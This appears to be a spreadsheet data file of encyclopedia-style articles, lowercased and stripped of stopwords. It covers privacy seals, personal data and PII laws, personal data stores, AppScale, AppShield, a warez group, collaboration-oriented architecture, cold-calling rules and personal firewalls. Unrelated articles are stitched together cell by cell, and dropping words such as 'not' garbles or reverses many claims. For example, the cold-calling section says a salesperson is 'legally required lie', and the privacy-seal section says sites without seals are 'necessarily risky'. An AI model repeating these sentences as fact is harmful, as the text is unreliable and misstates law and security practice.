online, customers prompted provide private information name, address, credit card information, sometimes birthdate. this information sold third-parties advertising purposes used company data profiling purposes. companies price discriminate using information collected predict highest price point customer willing pay.except federal trade commission guidelines, first established 1999 report, privacy protection mainly self-regulated united states. self regulators argue governmental intervention would harm e-commerce inflexibility allow company experiment policies disclosures. they believe legislative practices slow bureaucratic effectual; makes regulations burdensome helpful e-commerce. self regulation allows quick adaptations ultimately create ideal privacy practices. theory, businesses forced create privacy policies satisfy customers' concerns economic success relies able draw customers. because privacy major concern customers, purchase websites feel secure using. this relation consumer's perception company's website intention purchase cornerstone privacy seals.some detractors self regulation laissez faire regulation believe "race bottom" effect occur regulatory (financial) penalties. strauss found seal programs seem effective regards privacy believes lack regulation privacy seals seen high rates participation. they note conflict resolution investigative aspect privacy seal programs, state limited power redress situation. they given powers punitive action companies violation privacy standards. research jamal al., however, suggests lack regulation concern. even without governmental financial threats, e-commerce companies still adopt policies practices privacy protection disclosure. this despite general federal state requiring slight overlaps case protecting health information children. proponents governmental regulation believe legislation would officialize rules already followed many already. guidelines already followed companies result meeting customer expectation). proponents also state legislation united states could less specific european union's wiggle room business uses data collected could still exist. privacy seals assure consumers company taking measures protect privacy data. companies must undergo process inspection seal provider make sure meet certain standards. checks conducted regularly (depending provider done annually, biannually randomly) ensure compliance. although guidelines bare minimum, additional standards differ seal providers. example, secureassure (launched 1999) resorts opt-in practice rather disclosure measures. they allow companies participating seal certification service share information beyond primary i.e. selling advertisers. people using websites must opt-in receive promotional material (this includes emails). privacy seals usually come ranges hundred several thousand u.s. dollars. entertainment software rating board (esrb) privacy certification program utilizes sliding scale (starting based annual revenue company seeking certification.many privacy seal providers also serve complaint resolution services. participating seal service providers mediate conflicts customers website seal displayed. they also occasion launch formal investigation. severe action privacy seal provider enact revoking privacy seal company thus producing negative attention. action cannot taken remove website enact sizable financial penalty. uses privacy seals placed many different types e-commerce websites. companies also different motives wanting privacy seal. studies past looked effectiveness privacy general e-commerce, well specific categories like loan providers, travel booking, online bookstores. esrb several types privacy seals. their kids online compliance seal certifies companies whose target market children. there special laws stipulate extra measures protection privacy children e.g. children's online privacy protection (coppa). this seal meant indicate compliance additional standards. esrb entered privacy assurance space 1999 also introduced privacy seal mobile services 2013. study conducted examined online stores sold e-books, textbooks, audiobooks found websites privacy seals able charge price premium customers willing website deemed "safer" (via privacy seals) them. customers' perception trustworthiness results presence privacy assurance tool like privacy seal reputation company question. customers using websites seals higher rates satisfaction intention purchase again. privacy seals also desensitizes customers' perceptions service performance. kimery found study privacy seals slightly positive impact trust unfamiliar e-commerce retailers concerned. this means well-known brick mortar companies consideration decide privacy seals worthwhile.while privacy seals inform users privacy like disclosure notices, serve learning tool. users seal provider's website clicking seal) learn privacy protection practices used participating company, well company good standing.privacy seals make customers informed internet safety. this customers read privacy policies click privacy seal) therefore know actual policies privacy practices company. still, company privacy practices usually align customers' expect websites privacy seals. even though customers take extra step clicking seal, still accountability. privacy seal providers would lose business uphold privacy data protection certain extent shape policies desires (and priorities) customers. additionally, study ruppel followed four fledgling websites states businesses build websites reflect values. brick mortar store established trust consumers would unlikely build website would jeopardize relationship. reason, websites start intention promote product rather facilitate actual transactions. effectiveness there four main privacy seal providers: trustarc, bbbonline, webtrust, privacy. companies must make decision much want pay, addition deciding seal provider best fit. companies fall trap users fall into: perception trust. reputation brick mortar companies often translates online business place even though unearned. when bbbonline first started less clients already established trustarc, able attract clients like american airlines, ebay, dell computers, at&amp;t. this already established better business bureau (bbb), global credential evaluator, brick mortar marketplace. sheng used tracking experiments determine draws consumers' attentions amount information retained. they found regardless risk condition (cost product), fixation times longer privacy icons privacy text non-privacy content. research miyazaki compared perceived risk e-commerce forms shopping, specifically mail order purchases made telephone. they found consumers perceive online shopping dangerous methods, privacy seals effective mitigating concerns.although privacy seals shown work attracting customers, experienced limited success. case webtrust privacy seal program joint venture u.s. canada, study done determine cause slow growth. authors study, lala suggest might marketing issue. consumers unaware privacy seals look like, well purpose. bbbonline privacy seal service ceased taking applicants 2007 stopped service 2008, stopped websites displaying privacy seal day. privacy concerns level privacy concern vary depending type website. this partially impact consumer's intention purchase also affected price product level certainty company protect consumer data fact. study sheng examined levels concern changed product. they found situations dealing financial services, participants paid attention privacy practices (looking privacy seal notice). similarly, websites pertaining homework assistance, dating, medication also received high rates attention privacy practices. impact internet literacy social awareness privacy talked internet literacy perspective, well social awareness dimension. people knowledgeable terms internet necessarily well versed internet safety extent government involved. dinev analyzed data respondents using structural equation modeling test various relationships internet literacy, social awareness, internet privacy concerns, intention transact. they found people internet literate less concerns whereas people socially aware (pay attention socio-political factors current events) concerned privacy. past research shown young adults less likely concerned proactive privacy even though likely identity stolen. risk e-commerce security measures place organization's website also behavior consumer. each privacy seal provider standards addition following rough guidelines federal trade commission established privacy protection. bbbonline found make statements secure transmission information trustarc. generally speaking, websites privacy seals transparent privacy practices, often personal information websites without privacy seal. this privacy seals evoke sense trust customers makes willing share personal information. privacy seals tools persuasion. companies benefit privacy seal creates appearance trustworthiness. privacy seals little effect perceived risk using website, strongly affect trustworthy customer perceives website. websites without seals necessarily risky. this privacy seals product companies must opt-into, automatically given websites meet certain requirements. privacy seals mitigate risk, safety heuristic. controversies privacy seals landed water past slip ups. trustarc mistakenly used third party tracks information website. trustarc also discovered websites certified violation providing data marketing firm. international applications european union american creation, privacy seals, slowly made europe. most seal programs american origin also mainly consist u.s. websites. qxl, defunct online auction house, first european companies receive certification trustarc. seal programs europe make main focus reliability specific sector rather privacy protection european union (eu) already regulations place. u.s. company, epubliceye, partnered france's ebuyclub 1999 rate reliability shopping websites expanded 2000 include germany spain. like united states, seal programs failed gain traction europe. prior european union's passage directive 95/46/ec, data protection laws enacted individual (country) basis. also known "the protection individuals regard processing personal data free movement such data", directive 95/46/ec passed 1995. european union (eu) regulates also institutionalizes data privacy: every country data protection commissioner appointed agency.the european union strict regulations privacy unlike united states also needs ensure compliance multiple countries rather one. result, many american based privacy seal services used complain resolution services. europrise (started 2003) funded project serves main privacy seal service europe. starting 2009, controlled independent centre privacy protection schleswig-holstein (uld) german data protection agency. each europrise seal includes country certification body (company certified), unique certification number, expiration date. european multi-channel online trade association (emota) also trust seal geared towards european e-commerce, however cannot displayed alone. needs placed next accredited e-commerce trust seal. they also solely privacy focused. privacy data protection requirements qualification.whereas huge debate governmental self-regulation privacy united states, less controversial europe. this stems european idea state active role protecting constituents social harm. canada webtrust seal program joint venture american institute certified accountants (aicpa) canadian institute chartered accountants (cica). study lala shows despite initial excitement, product failed gain traction. they state likely factors: costs participating seal program prohibitive consumers cannot tell difference quality various privacy seal providers. lala found preference consumers high information assurance seals. they believe issue marketing. webtrust needs better convincing internet firms worth money program.the privacy data institute ryerson university partnered deloitte create privacy scorecard seal. based ryerson university's seven foundational principles, deloitte created measurable criteria. once determined company passes requirements, given permission display privacy seal referred "privacy design certification seal". this seal valid three years must renewed annually involves signing attestation form paying renewal fee. south korea privacy seals received countries. comparative study united states south korea, found privacy seals strongly positive effect customer's intention purchase strongly negative effect concerns united states. study's surveys (one based country) revealed privacy seals significantly influence south korean shopper's intent purchase concerns. suggest south korea's collectivist culture makes trusting government. places governmental influence welcomed would less privacy seals users would theory satisfied measures government takes protect privacy. japan privacy seals entered japanese market japanese government believed privacy assurance paramount ensuring growth e-commerce. starting april 1998, japan information processing development center (jipdec) managing privacymark program. years prior, jipdec published "guidelines personal data protection private sector". 2015, privacymark certified 19,000 organizations. 2008, jipdec created mutual recognition program china partnership dalian software industry association (dsia). also assurance service federal trade commission privacy policy trustmark trust seal trust signals references</t>
  </si>
  <si>
    <t>Personal data</t>
  </si>
  <si>
    <t>personal data, also known personal information personally identifiable information (pii), information related identifiable person. abbreviation widely accepted united states, phrase abbreviates four common variants based personal personally, identifiable identifying. equivalent, legal purposes effective definitions vary depending jurisdiction purposes term used. under european data protection regimes, centre primarily general data protection regulation (gdpr), term "personal data" significantly broader, determines scope regulatory regime.national institute standards technology special publication 800-122 defines personally identifiable information "any information individual maintained agency, including information used distinguish trace individual's identity, name, social security number, date place birth, mother's maiden name, biometric records; information linked linkable individual, medical, educational, financial, employment information." example, user's address classed own, classified linked pii. however, european union, address internet subscriber classed personal data.personal data defined gdpr "any information [is] related identified identifiable natural person".the concept become prevalent information technology internet made easier collect leading profitable market collecting reselling pii. also exploited criminals stalk steal identity person, planning criminal acts. response threats, many website privacy policies specifically address gathering pii, lawmakers european parliament enacted series legislation general data protection regulation (gdpr) limit distribution accessibility pii.important confusion arises around whether means information identifiable (that associated person) identifying (that associated uniquely person, identifies them). prescriptive data privacy regimes hipaa, items specifically defined. broader data protection regimes gdpr, personal data defined non-prescriptive principles-based way. information might count hipaa personal data purposes gdpr. reason, "pii" typically deprecated internationally. definitions u.s. government used term "personally identifiable" 2007 memorandum executive office president, office management budget (omb), usage appears standards nist guide protecting confidentiality personally identifiable information 800-122). memorandum defines follows: information used distinguish trace individual's identity, name, social security number, biometric records, etc. alone, combined personal identifying information linked linkable specific individual, date place birth, mother’s maiden name, etc. term similar pii, "personal data" defined directive 95/46/ec, purposes directive: article 'personal data' shall mean information relating identified identifiable natural person ('data subject'); identifiable person identified, directly indirectly, particular reference identification number factors specific physical, physiological, mental, economic, cultural social identity; however, rules, clearer notion data subject potentially identified additional processing attributes—quasi- pseudo-identifiers. gdpr personal data defined information relating identified identifiable natural person ('data subject'); identifiable natural person identified, directly indirectly, particular reference identifier name, identification number, location data, online identifier factors specific physical, physiological, genetic, mental, economic, cultural social identity natural person simple example distinction: colour name "red" personal data, value stored part person's record "favourite colour" personal data; connection person makes personal data, pii) value itself. another term similar pii, "personal information" defined section california data breach notification law, sb1386: purposes section, "personal information" means individual's first name first initial last name combination following data elements, either name data elements encrypted: social security number. driver's license number california identification card number. account number, credit debit card number, combination required security code, access code, password would permit access individual's financial account. purposes section, "personal information" include publicly available information lawfully made available general public federal, state, local government records. concept information combination given sb1386 definition correctly distinguishing pii, defined omb, "personal information", defined sb1386. information, name, lacks context cannot said sb1386 "personal information", must said defined omb. example, name john smith meaning current context therefore sb1386 "personal information", pii. social security number (ssn) without name associated identity context information sb1386 "personal information", pii. example, 078-05-1120 pii, sb1386 "personal information". however combination valid name correct sb1386 "personal information".the combination name context also considered pii; example, person's name list patients clinic. however, necessary name combined context order pii. reason distinction bits information names, although sufficient make identification, later combined information identify persons expose harm. according omb, always case "sensitive", context taken account deciding whether certain sensitive.when person wishes remain anonymous, descriptions often employ several above, 34-year-old white male works target". note information still private, sense person wish become publicly known, without personally identifiable. moreover, sometimes multiple pieces information, none sufficient uniquely identify individual, uniquely identify person combined; reason multiple pieces evidence usually presented criminal trials. shown that, 1990, population united states could uniquely identified gender, code, full date birth.in hacker internet slang, practice finding releasing information called "doxing". sometimes used deter collaboration enforcement. occasion, doxing trigger arrest, particularly enforcement agencies suspect "doxed" individual panic disappear. laws standards australia australia, privacy 1988 deals protection individual privacy, using oecd privacy principles 1980s broad, principles-based regulatory model (unlike coverage generally based broad principles specific technologies, business practices data items). section relevant definition. critical detail definition 'personal information' also applies individual indirectly identified: "personal information" means information opinion identified individual, individual reasonably identifiable whether information opinion true not; whether information opinion recorded material form not. [emphasis added] this raises question reasonableness: assume theoretically possible identify person information include name address, contain clues could pursued find relates much extra effort take make unreasonable information could identified? instance, information involves address, relevant stores logs could easily inspected exists sufficient legal justification) re-link address account holder, identity "reasonably ascertained"? linking used expensive, slow difficult, becomes easier, change answer point? appears definition significantly broader californian example given above, thus australian privacy law, respects weakly enforced, cover broader category data information law. particular, online behavioral advertising businesses based surreptitiously collecting information people countries form cookies, bugs, trackers like find preference avoid implications wanting build psychographic profile particular person using rubric collect personal information' find make sense broader definition like australian privacy act. term "pii" used australian privacy law. canada privacy governs federal government agencies ontario freedom information protection privacy similar provincial legislation governs provincial government agencies personal information protection electronic documents governs private corporations, unless equivalent provincial legislation ontario personal health information protection similar provincial legislation governs health information european union european data protection utilize concept personally identifiable information, scope instead determined non-synonymous, wider concept "personal data". article european convention human rights general data protection regulation adopted april 2016. effective 2018 supersedes data protection directive 95/46/ec directive 2002/58/ec (the e-privacy directive) directive 2006/24/ec article (the data retention directive)further examples found privacy website. united kingdom (data protection 2018) data protection 1998 superseded data protection 2018 general data protection regulation (europe, 2016) article european convention human rights regulation investigatory powers 2000 employers' data protection code practice model contracts data exports privacy electronic communications directive) regulations 2003 interception communications (lawful business practice) regulations 2000 anti-terrorism, crime security 2001 zealand twelve information privacy principles privacy 1993 apply. switzerland federal data protection june 1992 force since 1993) protection privacy prohibiting virtually processing personal data expressly authorized data subjects. protection subject authority federal data protection information commissioner.additionally, person writing company (managing data files) correction deletion personal data. company must respond within thirty days. united states privacy 1974 (pub.l. 93–579, stat. 1896, enacted december 1974, u.s.c. 552a), united states federal law, establishes code fair information practice governs collection, maintenance, use, dissemination personally identifiable information individuals maintained systems records federal agencies.one primary focuses health insurance portability accountability (hipaa), protect patient's protected health information (phi), similar pii. u.s. senate proposed privacy 2005, attempted strictly limit display, purchase, sale without person's consent. similarly, (proposed) anti-phishing 2005 attempted prevent acquiring phishing. u.s. lawmakers paid special attention social security number easily used commit identity theft. (proposed) social security number protection 2005 (proposed) identity theft prevention 2005 sought limit distribution individual's social security number. additional u.s. specific personally identifiable information includes, limited i-94 records, medicaid numbers, internal revenue services (i.r.s.) documentation. exclusivity personally identifiable information affiliated u.s. highlights national data security concerns influence personally identifiable information u.s. federal data management systems. state laws significant court rulings california california state constitution declares privacy inalienable right article section california online privacy protection (oppa) 2003 1386 requires organizations notify individuals combination additional, specific data elements) known believed acquired unauthorized person. 2011, california state supreme court ruled person's code pii. nevada nevada revised statutes 603a-security personal information massachusetts 17.00: standards protection personal information residents commonwealth 2013, massachusetts supreme court ruled codes pii. federal title united states code, section 1028d(7) privacy 1974, codified u.s.c. 552a seq. "privacy shield" rules harmonisation) nist definition national institute standards technology (nist) physical sciences laboratory, non-regulatory agency united states department commerce. mission promote innovation industrial competitiveness. following data, often used express purpose distinguishing individual identity, clearly classify personally identifiable information definition used nist (described detail below): national identification number (e.g., social security number u.s.) bank account numbers passport number driver's license number debit/credit card numbersthe following less often used distinguish individual identity, traits shared many people. however, potentially pii, combined personal information identify individual. full name home address city state postcode country telephone age, date birth, especially non-specific gender race cookie forensics forensics, particularly identification prosecution criminals, personally identifiable information critical establishing evidence criminal procedure. criminals great trouble avoid leaving pii, wearing masks, sunglasses, clothing obscure completely hide distinguishing features, eye, skin, hair colour, facial features, personal marks tattoos, birthmarks, moles scars. wearing gloves conceal fingerprints, pii. however, gloves also leave prints unique human fingerprints. after collecting glove prints, enforcement match gloves collected evidence. many jurisdictions wearing gloves committing crime prosecuted inchoate offense. avoiding writing anything handwriting. masking internet presence methods using proxy server appear connecting address unassociated oneself. personal safety personal data component online identity exploited individuals. instance, data altered used create fake documents, hijack mail boxes phone calls harass people, data breach limited company.another case referred financial identity theft, usually entails bank account credit card information stolen, used sold.personal data also used create fake online identity, including fake accounts profiles (that referred identity cloning identity fraud) celebrities gather data users easily. even individuals concerned, especially personal purpose (this widely known sockpuppetry). critical information, one's password, date birth, documents social insurance number, used different websites (see password reuse account verification) gather information access content. also, several agencies discretion subject related work, safety employees. reason, united states department defense (dod) strict policies controlling release personally identifiable information personnel. many intelligence agencies similar policies, sometimes point employees disclose friends work agency. similar identity protection concerns exist witness protection programs, women's shelters, victims domestic violence threats. trade personal data during second half 20th century, digital revolution introduced "privacy economics", trade personal data. value data change time different contexts. disclosing data reverse information asymmetry, though costs unclear. relation companies, consumers often "imperfect information regarding data collected, purposes, consequences."writing 2015, alessandro acquisti, curtis taylor liad wagman identified three "waves" trade personal data: 1970s, chicago boys school claimed protection privacy could negative impact market could lead incorrect non-optimal decisions. other researchers like andrew daughety jennifer reinganum suggested opposite true, absence privacy would also lead this. 1990s, varian retook chicago boys approach added externality, stating consumer would always perfect information data would used. kenneth laudon developed model individuals data ability sell product. believed system regulated, create free market. 2000s, researchers worked price discrimination (taylor, 2004), two-sided markets (cornière, 2011) marketing strategies (anderson palma, 2012). theories became complex, showed impact privacy economy highly depended context. also notes references external links things need know privacy framework legal analysis european regulatory framework data privacy personal professional information management power people! giving citizens personal data rights back cromack rethinking personal data lens report world economic forum consent different marketing preferences dewar</t>
  </si>
  <si>
    <t>Personal data service</t>
  </si>
  <si>
    <t>personal data services personal data stores (pds) services individual store, manage deploy personal data highly secure structured way.they give user central point control personal information (e.g. interests, contact information, affiliations, preferences, friends). user's data attributes managed service stored co-located repository, stored multiple external distributed repositories, combination both. attributes accessed api. users instance allowed selectively share sets attributes users. data ecosystem developing sharing among projects "operators" become practicable. open source projects cloud-based note: cloud-based pdses sometimes called personal data clouds personal clouds. (hat) hub-of-all-things personium.io open source personal data store solid project solid (social linked data) open-source decentralization project berners-lee. development tools dogsheep project build personal data warehouse. dogsheep collection tools (open-source) personal analytics using sqlite datasette (python). inactive data.fm open source, centralized underlying attribute store well enable bi-directional attribute updates external websites services. apis based standards include webdav, sparql linked data. data formats exchanged include rdf, json. locker project open source, javascript-based, centralized underlying attribute store exists person's personal computer well support local applications. openpds/safeanswers openpds/safeanswers allows users collect, store, give fine-grained access data protecting privacy. higgins higgins open source project dedicated giving individuals control personal identity, profile social network data. hole dynamic commercial consumer allows storing personal data dynamic sharing data parties. services for-profit atsign citizenme cozycloud based france dataswift operator service digime meeco ownyourinfo personal information storing sharing application. prifina personal data engine allows individuals value data empowers developers build applications user-held data. for-profit enterprise inrupt not-for-profit personal mydex empowers individuals manage lives convenient, trustworthy access control personal data used others. this achieved interoperable api-based components identity, consent personal data management. also data vault modeling identity management privacy design vendor relationship management references external links "unlocking value personal data: from collection usage" (pdf). world economic forum. 2013. retrieved 2016-01-08. market 'empowering personal data services "will transform relationships customers brands" ctrl-shift</t>
  </si>
  <si>
    <t>AppScale</t>
  </si>
  <si>
    <t>appscale software company offering cloud infrastructure software services enterprises, government agencies, contractors third party service providers. company commercially supports software product, appscale ats, managed hybrid cloud infrastructure software platform emulates core apis. 2019, company ended commercial support open-source serverless computing platform appscale gts, however source code remains freely available open-source community. history appscale began research project university california, santa barbara computer science department supervision professor chandra krintz. project originally funded nsf, additional funding google, nih. 2012, co-founders chandra krintz, chief scientist, navraj chohan, development lead, woody rollins, founded appscale systems commercialize private paas appscale technology. rollins, pioneer private cloud infrastructure, co-founder former eucalyptus systems. 2014, graziano obertelli joined appscale operations eucalyptus systems, co-founder. 2017, dimitrii calzago joined appscale hewlett packard enterprise, director cloud r&amp;d.in april 2014, appscale systems named 2014 cool vendor paas gartner, inc. september 2014, appscale systems bossie award infoworld best open source data center cloud software. appscale partnered optimal dynamics april 2016. appscale part alilaunch program, august 2016. chandra kritz, chief science officer appscale, featured radio episode titled "how rescue apps help appscale" december 2016.in late 2017, appscale systems started offering commercial support eucalyptus private cloud software technology chose stop development support eucalyptus. this prompted appscale, members eucalyptus founding team, fork code continue developing software, renamed appscale ats. appscale appscale (formerly eucalyptus) managed hybrid cloud infrastructure software emulates core apis. appscale implements aws-compatible cloud services dedicated infrastructure, providing dedicated private region. enables creation cost-effective flexible hybrid cloud environments seamless experience developers workloads across public private resources. special-purpose hardware unorthodox operating system configurations required entire software stack utilizes open-sourced components. software primarily used enterprises government agencies place data compute specific geographies (for compliance) close data sources (for latency). appscale appscale open-source serverless computing platform automatically deploys scales unmodified google engine applications public private clouds, well on-premises clusters. appscale modeled engine apis support java, php, python applications.the goal appscale provide developers rapid, api-driven development platform applications cloud infrastructure. appscale decouples logic service ecosystem give developers cloud administrators control deployment, data storage, resource use, backup migration.the platform allows developers focus business logic building scalable applications, freeing need concentrate deployment scaling logic. appscale decouples logic service ecosystem give developers cloud administrators control deployment, data storage, resource use, backup, migration.appscale includes high-level apis persistence, asynchronous execution, distributed memory cache, user authentication, more. handles service discovery, load-balancing, fault-tolerance, auto-scaling. also allows operations cloud administrators provide consistent, tunable environment running maintaining apps multiple cloud infrastructures. appscale developed maintained appscale systems, inc., based santa barbara, california, google. open source components datastore api: apache cassandra apache zookeeper memcache api: memcached task queue api: rabbitmq celery xmpp api: ejabberd channel api: ejabberd blobstore api: apache cassandra apache zookeeper images api: python imaging library (pil) cron api: crontab haproxy: haproxy supported platforms amazon cloudstack digitalocean eucalyptus google compute engine kernel-based virtual machine (kvm) microsoft azure openstack rackspace softlayer (ibm) supported languages java python also amazon services cloud computing oracle cloud platform service serverless computing external links official website references</t>
  </si>
  <si>
    <t>AppShield</t>
  </si>
  <si>
    <t>appshield world's first application firewall. appshield conceptualized eran reshef gili raanan introduced market perfecto technologies (now sanctum) summer 1999. appshield safeguard many systems protection code data. appshield product first product inspect incoming hypertext transfer protocol requests block malicious attacks based dynamic policy composed analyzing outgoing html pages. appshield used isolate target applications registers address space applications utilize memory unique return, rootkit can't access memory. product faced many market adoption challenges sanctum forced introduce complementary solution named appscan demonstrate need application security. 2004, networks acquired appshield's intellectual properties sanctum discontinued technology. gartner's magic quadrant (mq) 2015 application firewalls estimates global market size $420 million, percent annual growth. appshield rewrite application framework android modify device. references</t>
  </si>
  <si>
    <t>AppArmor Mobile</t>
  </si>
  <si>
    <t>apparmor mobile division cutcom software inc. builds custom mobile safety apps emergency notification systems university college institutions canada, united states, australia. company founded 2002 based toronto, ontario, canada. apparmor's partner institutions include university guelph, university nevada, reno, queen's university, dalhousie university, jacksonville university, wilfrid laurier university. apparmor's safety apps include features push notifications, location tracking, click-to-call capability. references</t>
  </si>
  <si>
    <t>Apocalypse Production Crew</t>
  </si>
  <si>
    <t>apocalypse production crew (styled apocalypse production crew apc) major warez organization founded individuals known pseudonyms acid^rain viper 1997. operated well mid-2000s subject raid operation fastlink—a coordination four separate simultaneous undercover investigations fbi, cyber division, u.s. department justice, computer crimes intellectual property section (ccips) criminal division interpol. known many first organized group mp3s onto internet. their efforts predated scene started composing midi versions popular songs. august 2003, mark shumaker (known pseudonym markalso), pleaded guilty violating copyright laws became first federal criminal prosecution someone specialized music piracy raided operation buccaneer. shumaker previously leader apc, time raid, retired role. members raided part operation buccaneer. they would five years later, however, raided operation fastlink caused disbanding group. also rabid neurosis (rns) references external links apocalypse production crew mp3scene</t>
  </si>
  <si>
    <t>Collaboration-oriented architecture</t>
  </si>
  <si>
    <t>collaboration oriented architecture (coa) computer system designed collaborate, services, systems outside operators control. collaboration oriented architecture often service oriented architecture deliver technical framework. collaboration oriented architecture ability collaborate systems based jericho forum principles "commandments".bill gates craig mundie (microsoft) clearly articulated need people work outside organizations secure collaborative manner opening keynote security conference february 2007.successful implementation collaboration oriented architecture implies ability successfully inter-work securely internet typically mean resolution problems come de-perimeterisation. etymology term collaboration oriented architectures defined developed meeting jericho forum meeting held hsbc july 2007. definition elements qualify security architecture collaboration oriented architecture follows; protocol: systems appropriately secure protocols communicate. authentication: protocol authenticated user and/or system credentials. federation: user and/or systems credentials accepted validated systems (locus control. network agnostic: design rely secure network, thus operate securely intranet raw-internet trust: collaborating system capacity able confirm specified degree confidence components transaction chain have. risk: collaborating systems make risk assessment transaction based communicated levels required trust, based required degree identity, confidentiality, integrity, availability. authentication working collaborative multi-sourced environment implies need authentication, authorization accountability must interoperate exchange outside locus area control. people/systems must able manage permissions resources rights users control there must capability trusting organization, authenticate individuals groups, thus eliminating need create separate identities principle, instance person system identity exist, privacy necessitates support multiple instances, instance multiple facets, often referred personas systems must able pass security credentials /assertions multiple loci (areas) control must supported references external links http://www.jerichoforum.org open collaboration service component architecture specifications collaboration-oriented software architecture modeling system enterprise collaboration service oriented architecture (soa) collaboration services services oriented architecture</t>
  </si>
  <si>
    <t>Cold calling</t>
  </si>
  <si>
    <t>cold calling solicitation business potential customers prior contact salesperson conducting call. attempt convince potential customers purchase either salesperson's product service. generally, referred over-the-phone process, making source telemarketing, also done in-person door-to-door salespeople. though cold calling used legitimate business tool, scammers cold calling well. evolution cold calling developed form giving sales pitch using script targeted communication tool. salespeople call list potential customers certain parameters built help increase likelihood sale. this modern cold calling, sometimes called "warm calling", tries "dig deeply understand" potential customer. criticisms with development newer technology internet, cold calling gained criticism. jeffrey gitomer wrote 2010 article augusta chronicle "the return investment cold calling zero." gitomer believes cold calling annoy customers attract business. gitomer also believes referral marketing better form selling marketing. according gitomer, "2.5 basic understandings cold call": cold calling lowest percentage sale call. cold calling high rejection rate. multiple rejections change salesperson's mentality make difficult friendly complete calls. since rise internet, social media instant text messaging, significant portion people tends prefer texting calling ignores incoming phone calls unfamiliar numbers.cold calling also used scammers. example groups impostors posed members microsoft support team. impostors called several homes database microsoft owners. microsoft customers told virus computers, order download specific program. program gave access computer files impostors. july 2006, survey conducted lactofree determined cold callers annoying thing cold calling hallmark proliferation boiler room scams selling fraudulent investment sports betting schemes australia's gold coast. rules regulations many countries rules regulations limit control how, companies cold call. these rules regulations often implemented government bodies deal telecommunication laws specific country. united states united states telecommunication laws developed enacted federal trade commission (ftc). aims "puts consumers charge number telemarketing calls home". united states, along many individual states, enacted various call" lists. these lists based national call list enacted 2003. every month, since january 2005, companies required check call list" database. they required remove registered numbers leads lists. however call list" certain limitations. even person registered call list", certain organizations still call. these organizations include: telephone surveyors, charities, political organizations organizations business relationship previous months company given written permissionthe also certain regulations called. cold calling done a.m. p.m. caller also required tell customer organization represent. this includes clarifying organization for-profit organization charity. salesperson also must reveal information product selling. this means legally required lie.many government organizations monitor cold calling within jurisdiction including u.s. securities exchange commission (sec). specializes monitoring cold calling deals stocks, specifically stockbrokers. when investing phone, states written banking information must given. this means investment cannot made phone. canada national call list (dncl) administered canadian radio-television telecommunications commission (crtc). u.s. version, rules exclude surveyors, charities, political organizations/candidates, organizations business relationship previous months otherwise granted permission, well newspapers seeking subscribers. united kingdom united kingdom version call list" known telephone preference service (tps). citizen united kingdom register list aims eliminate participants receiving unsolicited calls organizations including charities political parties unlike united states canada. first enacted 1999 eventually changes 2003 ultimately created privacy electronic communications directive) regulations 2003. while prevents unsolicited sales marketing calls, prevent "recorded/automated messages, silent calls, market research, overseas companies, debt collection, scam calls" according website. 2012, richard herman middlesex sent invoice company time kept cold-calling him. eventually took company small claims court, leading company settling court. phoned several times company despite listed telephone preference service. australia australia version call list" known call register. call register" jurisdiction australian communications media authority (acma) acts supreme telecommunications authority australia. registering call register" prevents telemarketers marketers contacting registered members. registration program free last eight years. similar countries, exceptions call register". these exceptions include: political parties, charities educational institutions. call register" takes effect days registration. republic ireland republic ireland, "national directory database" index numbers cannot called purposes 'cold calls' and/or sales advertising. unsolicited marketing call number national directory database criminal offence. japan some financial products totally permitted cold-call, practice generally permitted within guideline requires stating name business, full name caller, name product intention solicitation. there do-not-call list. japanese government's financial services agency maintains list known fraudulent entities involved financial cold-calling scams. european union 2018, european union passed general data protection regulation imposes obligations onto organizations anywhere, long target collect data related people references external links (free) anti-cold calling register help stop unwanted marketing calls federal call list federal trade commission (ftc), national call registry information</t>
  </si>
  <si>
    <t>Personal firewall</t>
  </si>
  <si>
    <t>personal firewall application controls network traffic computer, permitting denying communications based security policy. typically works application layer firewall. personal firewall differs conventional firewall terms scale. personal firewall usually protect computer installed, compared conventional firewall normally installed designated interface networks, router proxy server. hence, personal firewalls allow security policy defined individual computers, whereas conventional firewall controls policy networks connects. per-computer scope personal firewalls useful protect machines moved across different networks. example, laptop computer used trusted intranet workplace minimal protection needed conventional firewall already place, services require open ports file printer sharing useful. laptop could used public wi-fi hotspots, necessary decide level trust reconfigure firewall settings limit traffic computer. firewall configured allow different security policies network. unlike network firewalls, many personal firewalls able control network traffic allowed programs secured computer. when application attempts outbound connection, firewall block blacklisted, user whether blacklist known. this protects malware implemented executable program. personal firewalls also provide level intrusion detection, allowing software terminate block connectivity suspects intrusion attempted. features common personal firewall features: block alert user unauthorized inbound outbound connection attempts. allows user control programs cannot access local network and/or internet provide user information application makes connection attempt. hide computer port scans responding unsolicited network traffic. monitor applications listening incoming connections. monitor regulate incoming outgoing internet users. prevent unwanted network traffic locally installed applications. provide information destination server application attempting communicate. track recent incoming events, outgoing events, intrusion events accessed tried access computer. blocks prevents hacking attempt attack hackers. limitations firewalls help protecting internal network hackers, however firewall limitations. system compromised malware, spyware similar software, programs also manipulate firewall, running system. possible bypass even completely shut software firewalls manner. firewall can't notify, incorrectly configured. firewall limit access internet, protect network wireless access systems. firewalls virtual private networks solution secure private documents emails either sent within organization business contacts outside organization. alerts generated possibly desensitize users alerts warning user actions malicious. software firewalls interface operating system firewalls security software kernel mode level potentially cause instability and/or introduce security flaws. history 1990s, part information security architecture project fortune corporation united states (the anheuser-busch corporation), members three-man architectural development team came concept regards improving overall security operating system used computers within networked system network system referred budnet). improving overall security operating system commonly referred hardening." member team charged ssgt. donald woeltje concept came installation special software (firewall software) every budnet server, workstation, perimeter security device. indeed, every single windows system budnet network. this concept commonly referred "personal firewall" software. ssgt. woeltje invent personal firewall software, invent idea "personal firewall." evidence fact exists anheuser-busch security model proposal document made ssgt. woeltje, time. when ssgt. woeltje brought leading firewall vendors meetings concerning products considered perimeter security budnet network, ssgt. woeltje brought concept "personal firewall" vendors asked firewall product could used way. with exception representatives cyberguard corporation, every vendor said firewall software could used also said idea crazy unworkable. but, today know wrong personal firewall software become facto computer security standard. companies ssgt. woeltje discussed "personal firewall" software were, among others, cisco, checkpoint, axent technologies, milkyway networks, cyberguard, network one, trusted information systems, secure computing corporation. also antivirus software comparison firewalls computer security network security references external links software firewalls: made straw? part part explanation design, discussion susceptibility windows computers circumvention layered service provider. software firewall test rankings, matousec, 2014</t>
  </si>
  <si>
    <t>Application permissions</t>
  </si>
  <si>
